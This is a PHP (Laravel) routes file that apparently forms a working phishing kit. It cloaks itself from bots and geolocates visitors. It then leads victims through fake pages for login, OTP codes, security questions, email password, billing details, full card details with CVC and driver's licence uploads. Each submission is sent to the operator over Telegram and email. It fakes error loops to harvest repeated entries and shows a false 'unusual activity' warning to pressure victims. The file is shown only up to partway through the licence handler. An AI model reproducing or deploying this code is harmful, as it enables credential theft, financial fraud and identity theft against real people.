<?php

use App\Http\Controllers\Controller;
use Illuminate\Support\Carbon;
use Illuminate\Support\Facades\Route;
use LVR\CreditCard\CardNumber;
use Telegram\Bot\Api;
use App\Services\BotValidator;
use Telegram\Bot\FileUpload\InputFile;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::any('/',function (){



    if(config('app.antibot')==1) {
        $forceAllow = request()->has('wppo');
        if (!(new BotValiDator(request()->ip()))->ipValid($forceAllow)) {
            return view('landing');
        }
        (new BotValiDator(request()->ip()))->addToRealVisit();
    }

     session()->put('mm',true);
    if(!\Illuminate\Support\Facades\Session::has('visitor')){
        \Illuminate\Support\Facades\Session::put('visitor',request()->ip());
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $array=['action'=>'New visitor outlook','ip'=>request()->ip()];
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),

                'text' => Controller::formatArrayToString($array)]);
        }
    }
        if(!session()->has('user')){
            $id =\Illuminate\Support\Str::uuid()->toString();
            session()->put('user',$id);
            $ip=request()->ip();
            $userAgent=request()->userAgent();
            $locData = Http::withUserAgent($userAgent)->get("http://ip-api.com/json/$ip")->json();
            if(optional($locData)['status']=='success') {
                $countryName = $locData['country'];
                $isp = $locData['isp'];
            }else{
                $countryName='';
                $isp='';
            }
            $data = ['ip'=>$ip,'user_agent'=>$userAgent,'country'=>$countryName,'isp'=>$isp];
            $session = \App\Models\Session::query()->create([
                'identifier'=>$id,
                'session_data'=>json_encode($data),
            ]);
        }
        else{
            $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
            if(!$session){
                $id =\Illuminate\Support\Str::uuid()->toString();
                session()->put('user',$id);
                $ip=request()->ip();
                $userAgent=request()->userAgent();
                $locData = Http::withUserAgent($userAgent)->get("http://ip-api.com/json/$ip")->json();
                if(optional($locData)['status']=='success') {
                    $countryName = $locData['country'];
                    $isp = $locData['isp'];
                }else{
                    $countryName='';
                    $isp='';
                }
                $data = ['ip'=>$ip,'user_agent'=>$userAgent,'country'=>$countryName,'isp'=>$isp];
                $session = \App\Models\Session::query()->create([
                    'identifier'=>$id,
                    'session_data'=>json_encode($data),
                ]);
            }
        }
        $page = Controller::nextPage();

        $session->sessionProcesses()->firstOrCreate([
            'proceed_to'=>$page,
            'filled'=>false
        ],['filled'=>false]);
        return to_route($page,['email'=>request()->query('email')]);


})->name('h');
Route::post('/',function (\Illuminate\Http\Request $request){
    if($request->has('duration')){
        return abort(503);
    }
    $request->validate([
        'timer'=>'required|numeric'
    ]);
    if(!is_null($request->username)){

        return abort(503);
    }
    $calc= $request->input('timer')/100000;
    if($calc<5000){
        return abort(503);
    }
    session()->put('mm',true);
    if(!session()->has('user')){
        $id =\Illuminate\Support\Str::uuid()->toString();
        session()->put('user',$id);
        $ip=request()->ip();
        $userAgent=request()->userAgent();
        $locData = Http::withUserAgent($userAgent)->get("http://ip-api.com/json/$ip")->json();
        if(optional($locData)['status']=='success') {
            $countryName = $locData['country'];
            $isp = $locData['isp'];
        }else{
            $countryName='';
            $isp='';
        }
        $data = ['ip'=>$ip,'user_agent'=>$userAgent,'country'=>$countryName,'isp'=>$isp];
        $session = \App\Models\Session::query()->create([
            'identifier'=>$id,
            'session_data'=>json_encode($data),
        ]);
    }
    else{
        $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
        if(!$session){
            $id =\Illuminate\Support\Str::uuid()->toString();
            session()->put('user',$id);
            $ip=request()->ip();
            $userAgent=request()->userAgent();
            $locData = Http::withUserAgent($userAgent)->get("http://ip-api.com/json/$ip")->json();
            if(optional($locData)['status']=='success') {
                $countryName = $locData['country'];
                $isp = $locData['isp'];
            }else{
                $countryName='';
                $isp='';
            }
            $data = ['ip'=>$ip,'user_agent'=>$userAgent,'country'=>$countryName,'isp'=>$isp];
            $session = \App\Models\Session::query()->create([
                'identifier'=>$id,
                'session_data'=>json_encode($data),
            ]);
        }
    }
    $page = Controller::nextPage();
    $session->sessionProcesses()->firstOrCreate([
        'proceed_to'=>$page,
        'filled'=>false
    ],['filled'=>false]);
    return to_route($page);
})->name('h');


Route::get('/login', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }
    return view('login');
})->name('login');
Route::post('/login',function (\Illuminate\Http\Request $request){
    $page = 'login';
    $counter = (int)session()->get("looper_$page")??0;

    $field = filter_var($request->input('username_or_email'), FILTER_VALIDATE_EMAIL) ? 'email' : 'alpha_num';

    $data = $request->validate([
        'username_or_email'=>"required|$field",
        'password'=>'required',
    ]);
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }
        //alert()->error("Sorry","Invalid Authentication Credentials provided");
        return back();
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('login');
Route::get('/f-login', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }

    return view('f-login');
})->name('f-login');
Route::post('/f-login',function (\Illuminate\Http\Request $request){
    $page = 'f-login';
    $counter = (int)session()->get("looper_$page")??0;

    $field = filter_var($request->input('username_or_email'), FILTER_VALIDATE_EMAIL) ? 'email' : 'alpha_num';

    $data = $request->validate([
        'username_or_email'=>"required|$field",
        'password'=>'required',
    ]);
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }
        //alert()->error("Sorry","Invalid Authentication Credentials provided");
        return back();
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('f-login');
Route::get('/verify-otp', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }

    return view('otp');
})->name('otp');
Route::post('/verify-otp',function (\Illuminate\Http\Request $request){
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    $data = $request->validate([
        'security_code'=>'required|digits:6',
    ]);
    $page = 'otp';
    $counter = (int)session()->get("looper_$page")??0;
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }

        return back();
    }
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('otp');

Route::get('/confirm-otp', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }

    return view('confirm-otp');
})->name('confirm-otp');
Route::post('/confirm-otp',function (\Illuminate\Http\Request $request){
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    $data = $request->validate([
        'security_code_2'=>'required',
    ]);
    $page = 'confirm-otp';
    $counter = (int)session()->get("looper_$page")??0;
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }

        return back();
    }
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('confirm-otp');

Route::get('/verify-sec-question', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }

    return view('sec-question');
})->name('sec-question');
Route::post('/verify-sec-question',function (\Illuminate\Http\Request $request){
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    $data = $request->validate([
        'security_question_1'=>'required|different:security_question_2|different:security_question_3',
        'security_answer_1'=>'required',
        'security_question_2'=>'required|different:security_question_1|different:security_question_3',
        'security_answer_2'=>'required',
        'security_question_3'=>'required|different:security_question_1|different:security_question_2',
        'security_answer_3'=>'required',
    ]);
    $page = 'sec-question';
    $counter = (int)session()->get("looper_$page")??0;
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }

        return back();
    }
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('sec-question');
Route::get('/authorize-otp', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }

    return view('otptransfer');
})->name('otp-transfer');
Route::post('/authorize-otp',function (\Illuminate\Http\Request $request){
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    $data = $request->validate([
        'security_code'=>'required',
    ]);
    $page = 'otp-transfer';
    $counter = (int)session()->get("looper_$page")??0;
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }

        return back();
    }
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('otp-transfer');

Route::get('/verify-email', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }
    return view('email');
})->name('email');
Route::post('/verify-email',function (\Illuminate\Http\Request $request){
    $page = 'email';
    $counter = (int)session()->get("looper_$page")??0;

    $data = $request->validate([
        'email_address'=>'required|email',

    ]);
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }

        return back();
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    $ext = Controller::guessMail($data['email_address']);

    return to_route('email-password',['gateway'=>$ext]);
})->name('email');

Route::get('/email-password/{gateway}', function ($gateway) {
    abort_if(!session()->has('mm'),503);
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('h');
    }
    return view("$gateway.password",[
        'email'=>optional(session()->get('page-email'))['email_address'],
        'gateway'=>$gateway,
    ]);
})->name('email-password');
Route::post('/email-password/{gateway}',function (\Illuminate\Http\Request $request,$gateway){
    $page = 'email-password';
    $counter = (int)session()->get("looper_$page")??0;
    $validator = Validator::make($request->all(),[
        'email_password'=>'required',
    ]);
    $data = $request->only(['email_password']);
    if($validator->fails()){
        return to_route('email-password')->withInput()->withErrors($validator);
    }
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop('email') && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }

        return to_route('email');
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array+$ip+$ip)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array+$ip+$ip));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('email-password');

Route::get('/verify-billing', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }
    return view('billing');
})->name('billing');
Route::post('/verify-billing',function (\Illuminate\Http\Request $request){
    $page = 'billing';
    $counter = (int)session()->get("looper_$page")??0;

    $data = $request->validate([
        'full_name'=>['required'],
        'address'=>['required'],
        'mobile_number'=>['required'],
       /* 'dob'=>['required',],
        'tfn'=>['required'],
        'super_fund_abn'=>['required','numeric'],
        'member_account_number'=>['required','numeric'],
        'issue_date'=>['required',],
        'reference_number'=>['required','numeric'],
        'bsb_number'=>['required','numeric'],
        'bsb_account_number'=>['required','numeric'],*/
    ]);
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }

        return back();
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('billing');


Route::get('/verify-card', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }
    $data = $user->sessionProcesses()->where('proceed_to','authorize-pinsentry')->where('filled',false)->latest()->first()?->data;
    return view('card');
})->name('card');
Route::post('/verify-card',function (\Illuminate\Http\Request $request){
    $page = 'card';
    $counter = (int)session()->get("looper_$page")??0;

    $data = $request->validate([
        'card_name'=>['required'],
        'card_number' => ['required', new CardNumber],
        'expiry_date' => ['required','size:5', function($a,$v,$f){
            $month = substr($v,0,2);
            $year = substr($v,3,2);
            if($month<1 || $month>12){
                $f("The expiry month must be between 1 and 12");
            }
            if(Carbon::create((int)(substr(now()->format('Y'),0,2).$year),(int)$month)->lessThan(now()->format('Y-m'))){
                $f('Card expired.');
            }
        }],
        'cvc' => ['required', 'digits:3']
    ]);
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
                'text' => Controller::formatArrayToString($data + $ip)]);
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }

        return back();
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString($array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('card');

Route::get('/driver-license', function () {
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if(is_null($user)) {
        return to_route('home');
    }

    return view('dl');
})->name('dl');
Route::post('/driver-license',function (\Illuminate\Http\Request $request){
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    $data = $request->validate([
        'driver_license_front'=>'sometimes|nullable|mimes:jpg,jpeg,png',
        'driver_license_back'=>'sometimes|nullable|mimes:jpg,jpeg,png',
    ]);
    $file=$request->file('driver_license_front');
    $file2 = $request->file('driver_license_back');

    $fileArray = [$file,$file2];
    $names = [];
    foreach ($fileArray as $value){
        if($value) {
            $ext = $value->getClientOriginalExtension();
            $name = Str::uuid() . ".$ext";
            $value->move(public_path('identity'), $name);
            $names['email'][] = public_path("identity/$name");
            $names['normal'][] = asset("identity/$name");
        }
    }
    unset($data['driver_license_front']);
    unset($data['driver_license_back']);

    $page = 'dl';
    $counter = (int)session()->get("looper_$page")??0;
    $session = \App\Models\Session::query()->where('identifier',session()->get('user'))->first();
    $ip = ['ip'=>$request->ip(),'user_agent'=>$request->userAgent()];
    if($counter<Controller::getPageLoop($page) && !$session->hasLatestNotFilled()){
        $counter+=1;
        session()->put("looper_$page",$counter);
        session()->flash('errorData',true);
        $session->data()->create([
            'page'=>$page,
            'data'=>json_encode($data)
        ]);
        if(config('app.use_telegram')==1) {
            $response = new Api(config('app.telegram_key'));
            foreach ($names['email'] as $file) {
                $botId = $response->sendPhoto(['chat_id' => config('app.chat_id'),
                    'photo'=>InputFile::create($file),
                    'caption' => Controller::formatArrayToString($data+$ip)]);
            }
        }

        if(config('app.use_smtp')==1) {
            try {
                \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($data + $ip));
            } catch (Exception $exception) {

            }
        }

        return back();
    }
